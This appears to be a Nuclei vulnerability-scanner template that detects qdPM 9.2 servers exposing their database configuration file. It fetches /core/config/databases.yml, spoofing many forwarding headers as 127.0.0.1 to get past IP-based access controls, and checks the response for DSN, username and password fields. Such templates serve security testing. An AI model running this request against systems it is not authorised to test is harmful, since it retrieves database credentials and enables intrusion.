id: qdpm-info-leak

info:
  author: gy741
  description: The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
  name: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
  severity: high
  tags: qdpm,exposure
  reference:
    - https://www.exploit-db.com/exploits/50176

requests:
  - method: GET
    headers:
      Proxy-Host: 127.0.0.1
      Real-Ip: 127.0.0.1
      X-Client-IP: 127.0.0.1
      X-Custom-IP-Authorization: 127.0.0.1
      X-Forwarded: 127.0.0.1
      X-Forwarded-By: 127.0.0.1
      X-Forwarded-For: 127.0.0.1
      X-Forwarded-For-Original: 127.0.0.1
      X-Forwarded-Host: 127.0.0.1
      X-Forwarded-Port: 127.0.0.1
      X-Forwarded-Server: 127.0.0.1
      X-Forwarder-For: 127.0.0.1
      X-Forward-For: 127.0.0.1
      X-Host: 127.0.0.1
      X-Http-Destinationurl: 127.0.0.1
      X-Http-Host-Override: 127.0.0.1
      X-Original-Remote-Addr: 127.0.0.1
      X-Original-Url: 127.0.0.1
      X-Originating-IP: 127.0.0.1
      X-Proxy-Url: 127.0.0.1
      X-Real-Ip: 127.0.0.1
      X-Remote-Addr: 127.0.0.1
      X-Remote-IP: 127.0.0.1
      X-Rewrite-Url: 127.0.0.1
    path:
      - '{{BaseURL}}/core/config/databases.yml'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'dsn:'
          - 'username:'
          - 'password:'
        condition: and

      - type: status
        status:
          - 200
